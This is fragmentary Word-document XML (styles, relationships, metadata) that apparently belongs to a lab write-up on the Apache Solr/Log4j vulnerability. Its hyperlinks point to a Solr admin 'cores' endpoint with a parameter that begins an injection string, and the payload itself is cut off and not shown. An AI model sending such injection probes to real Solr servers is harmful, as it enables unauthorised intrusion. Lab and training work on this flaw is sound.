    <w:rsid w:val="00FF1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F6EDB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{486A337D-89DC-4E4C-BD4C-ADB393117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379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79B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379B7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C379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379B7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="skimlinks-unlinked">
    <w:name w:val="skimlinks-unlinked"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C379B7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="440" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="660" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="880" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1100" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1320" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1540" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1760" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1980" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00002460"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00431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945"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00431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945"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004319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1945"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004319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59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room/solar" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://serviceip:8983/solr/admin/cores?fo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serveraddress:8983/solr/admin/cores?foo=$"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B75EA-F8FF-41D7-8B5F-DFE2C92D9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Goel</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aayush Goel</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-28T19:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-28T19:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>